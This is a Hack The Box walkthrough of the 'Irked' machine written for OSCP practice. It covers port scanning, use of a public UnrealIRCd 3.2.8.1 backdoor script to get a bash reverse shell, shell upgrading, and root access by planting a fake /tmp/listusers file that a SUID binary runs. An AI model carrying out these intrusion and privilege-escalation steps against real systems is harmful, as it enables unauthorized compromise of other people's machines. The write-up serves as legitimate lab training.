Hack The Box — Irked — without Metasploit (TJNull’s list for OSCP)
This is my 11th write-up for Irked, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target. First let’s try to find out what ports are open and then we will run a detailed scan only on those ports to save time.
nmap -p- 10.129.184.170 --max-retries=1
We can see what ports are open here. Let’s do a detailed nmap on these ports.
nmap -sC -sV -O -A -T4 -Pn -p22,80,111,6697,8067,60447,65534 10.129.184.170Meanwhile, it’s running let’s visit the web-server to see what we have there.
Here, we just have an Image and a text saying “IRC is almost working!”.
I think that one of the open ports are IRC, nmap is scanning in the background anyways. We will be sure once it’s completed. For now, Let’s do some directory busting.
gobuster dir -u http://10.129.184.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -t 200 -k - no-error
It only shows /manual and /server-status directories. Nothing interesting here. Let’s see what nmap found out.
Here we found out that port 6697,8067,65534; all of them are running UnrealIRCd.
IRC is actually Internet Relay Chat commonly used for chat rooms. To exploit this we need to know what version of UnrealIRC is running.
Let’s try to connect to this port with netcat.
nc 10.129.184.170 6697
So we have a connection, and I have no idea how to speak IRC language. Let’s try ‘HELP’ and see if it gives us some commands.
It gives Error code 451, saying “You have not registered”. So let’s google this error code.
And Google served me the following link:
https://forums.unrealircd.org/viewtopic.php?t=5620
Here, I can see some commands that I need to execute to register first. Let’s give dummy data and see what happens.
PASS DAEMON
NICK DAEMON
USER DAEMON 0 * :DAEMONEXALA
And it returned a lot of things, and we can see what version of Unreal is running and that is 3.2.8.1
Okay, You know what we do when we have a version for a service, don’t you?
searchsploit Unreal 3.2.8.1
We have a Backdoor metasploit module, but we are not gonna use it. Since, we are preparing for OSCP lol.
Exploitation
Let’s search for Unreal 3.2.8.1 Backdoor on Google. That’s what I found:
https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor
First, see the code and put our IP and port for the reverse connection.
Let’s run it.
And it tells us that it requires an IP and Port of the target (of course) and it also requires a parameter of -payload which has 3 options, (python, netcat,bash).
Let’s get a bash shell.
First start a listener.
nc -lvnp 8080Now execute the python script.
python irc.py 10.129.184.170 6697 -payload bash
And it says “Exploit sent successfully!”
Let’s check the listener.
And we got a shell! :)
Let’s upgrade the shell first.
python -c 'import pty;pty.spawn("/bin/bash")'Press CTRL+Z to background it.
stty raw -echoThen
fgAnd then hit Enter twice.
We are back in the shell. Now finally
export TERM=xtermAnd we have a full tty shell.
Privilege Escalation
First things first, let’s check what commands we can run as sudo.
sudo -l
And sudo is not installed.
Let’s check the files with SUID.
find / -perm -u=s -type f 2>/dev/null
There’s this viewuser binary file that I am not aware of. Let’s run this and see what it does.
It says “/tmp/listusers: not found”.
Hmm… Interesting…!
Let’s create a file listusers in /tmp and put a shell invoking script in that and see if it runs.
nano /tmp/listusers
===================inside the file=============
#!/bin/bash
/bin/bash
Let’s make it executable.
chmod +x /tmp/listusersNow let’s run the viewuser binary.
And we are root!
:)
